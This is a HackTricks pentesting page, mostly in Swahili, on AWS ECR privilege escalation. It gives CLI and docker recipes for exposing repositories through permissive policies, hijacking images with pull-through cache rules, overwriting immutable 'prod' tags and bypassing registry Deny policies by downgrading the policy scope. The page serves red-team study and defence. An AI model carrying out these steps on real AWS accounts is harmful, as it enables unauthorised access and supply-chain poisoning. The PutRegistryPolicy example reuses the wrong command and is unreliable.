AWS - ECR Privesc

Reading time: 9 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Mshambuliaji mwenye ecr:GetAuthorizationToken na ecr:BatchGetImage anaweza kuingia kwenye ECR na kupakua images.

Kwa taarifa zaidi kuhusu jinsi ya kupakua images:

AWS - ECR Post Exploitation

Potential Impact: Inaweza kusababisha privesc kwa kuingilia kati taarifa nyeti kwenye trafiki.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Mshambuliaji mwenye ruhusa zote hizi anaweza kuingia kwenye ECR na kupakia images. Hii inaweza kusaidia kupanua ruhusa kwa mazingira mengine ambapo images hizo zinatumika.

Ili kujifunza jinsi ya kupakia image mpya/au kusasisha moja, angalia:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Kama sehemu iliyotangulia, lakini kwa repositories za umma.

ecr:SetRepositoryPolicy

Mshambuliaji mwenye ruhusa hii anaweza change the repository policy ili kumpa yeye mwenyewe (au hata kila mtu) read/write access.
Kwa mfano, katika mfano huu read access imetolewa kwa kila mtu.

bash
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Maudhui ya my-policy.json:

json
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Kama sehemu iliyopita, lakini kwa repositories za umma.
Mshambuliaji anaweza kubadilisha sera ya repository ya ECR Public repository ili kutoa ufikaji wa umma usioidhinishwa au kuongeza vibali vyao.

bash
# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Athari Inayowezekana: Ufikiaji wa umma usioidhinishwa kwa ECR Public repository, ukimruhusu mtumiaji yeyote push, pull, au delete images.

ecr:PutRegistryPolicy

Mdukuzi mwenye ruhusa hii anaweza kubadilisha sera ya rejista ili kujipa yeye mwenyewe, akaunti yake (au hata kila mtu) ufikiaji wa kusoma/kuandika.

bash
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

ecr:CreatePullThroughCacheRule

Tumia vibaya sheria za ECR Pull Through Cache (PTC) kuoanisha upstream namespace inayodhibitiwa na mshambuliaji na prefix ya private ECR inayotambulika. Hii inafanya workloads zinazovuta kutoka private ECR kupokea picha za mshambuliaji kwa uwazi bila push yoyote kwenye private ECR.

  • Ruhusa zinazohitajika: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. Ikiwa unatumia ECR Public kama upstream: ecr-public:* ili kuunda/ku-push kwenye public repo.
  • Upstream iliyojaribiwa: public.ecr.aws

Hatua (mfano):

  1. Prepare attacker image in ECR Public

Get your ECR Public alias with: aws ecr-public describe-registries --region us-east-1

docker login public.ecr.aws/<public_alias> docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test . docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test

  1. Create the PTC rule in private ECR to map a trusted prefix to the public registry aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws

  2. Pull the attacker image via the private ECR path (no push to private ECR was done) docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test

Potential Impact: Uharibifu wa mnyororo wa ugavi kwa kuiba majina ya ndani ya image chini ya prefix uliyochaguliwa. Workload yoyote inayovuta images kutoka private ECR kwa kutumia prefix hiyo itapokea maudhui yanayotawaliwa na mshambuliaji.

ecr:PutImageTagMutability

Tumia vibaya ruhusa hii kubadilisha repository yenye tag immutability kuwa mutable na kuandika juu ya tags zinazotegemewa (mf., latest, stable, prod) na maudhui yanayotawaliwa na mshambuliaji.

  • Ruhusa zinazohitajika: ecr:PutImageTagMutability pamoja na uwezo wa ku-push (ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage).
  • Athari: Uharibifu wa mnyororo wa ugavi kwa kimya kwa kuchukua nafasi tags zisizobadilika bila kubadilisha majina ya tag.

Hatua (mfano):

Kuathiri tag isiyobadilika kwa kubadilisha mutability
bash
REGION=us-east-1
REPO=ht-immutable-demo-$RANDOM
aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
# Build and push initial trusted tag
printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Attempt overwrite while IMMUTABLE (should fail)
printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Flip to MUTABLE and overwrite
aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Validate consumers pulling by tag now get the poisoned image (prints V2)
docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod

Utekaji wa rejista ya kimataifa kupitia ROOT Pull-Through Cache rule

Unda Pull-Through Cache (PTC) rule ukitumia maalum ecrRepositoryPrefix=ROOT ili kuoanisha mzizi wa rejista ya ECR ya kibinafsi na rejista ya umma ya upstream (mfano, ECR Public). Kuvuta yoyote kwa repository isiyokuwepo kwenye rejista ya kibinafsi kutahudumiwa kwa uwazi kutoka upstream, kuruhusu supply-chain hijacking bila kuipakia kwenye ECR binafsi.

  • Idhini zinazohitajika: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
  • Athari: Kuvuta kwenye <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> kutafanikiwa na yataunda repos binafsi kiotomatiki zikichukuliwa kutoka upstream.

Kumbuka: Kwa ROOT rules, acha --upstream-repository-prefix. Kutoa thamani yake kutaashiria kosa la uthibitisho.

Demo (us-east-1, upstream public.ecr.aws)
bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)
aws ecr create-pull-through-cache-rule \
--region "$REGION" \
--ecr-repository-prefix ROOT \
--upstream-registry-url public.ecr.aws

# 2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com

# Example using an official mirror path hosted in ECR Public
# (public.ecr.aws/docker/library/alpine:latest)
docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest

# 3) Verify repo and image now exist without any push
aws ecr describe-repositories --region "$REGION" \
--query "repositories[?repositoryName==docker/library/alpine]"
aws ecr list-images --region "$REGION" --repository-name docker/library/alpine --filter tagStatus=TAGGED

# 4) Cleanup
aws ecr delete-pull-through-cache-rule --region "$REGION" --ecr-repository-prefix ROOT
aws ecr delete-repository --region "$REGION" --repository-name docker/library/alpine --force || true

ecr:PutAccountSetting (Shusha REGISTRY_POLICY_SCOPE to bypass registry policy denies)

Abuse ecr:PutAccountSetting ili kubadilisha upeo wa registry policy kutoka V2 (sera inayotumika kwa vitendo vyote vya ECR) hadi V1 (sera inayotumika tu kwa CreateRepository, ReplicateImage, BatchImportUpstreamImage). Ikiwa registry policy kali ya Deny inazuia vitendo kama CreatePullThroughCacheRule, kushusha hadi V1 kunaharibu utekelezaji huo ili identity‑policy Allows zichukue nafasi.

  • Idhini zinazohitajika: ecr:PutAccountSetting, ecr:PutRegistryPolicy, ecr:GetRegistryPolicy, ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule.
  • Athari: Uwezo wa kufanya vitendo vya ECR vilivyokuwa vimezuiliwa hapo awali na registry policy Deny (mfano, kuunda PTC rules) kwa muda kwa kuweka upeo kuwa V1.

Hatua (mfano):

Bypass registry policy Deny kwenye CreatePullThroughCacheRule kwa kubadili kwenda `V1`
bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json

# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION

# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi

# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws

# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"

# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks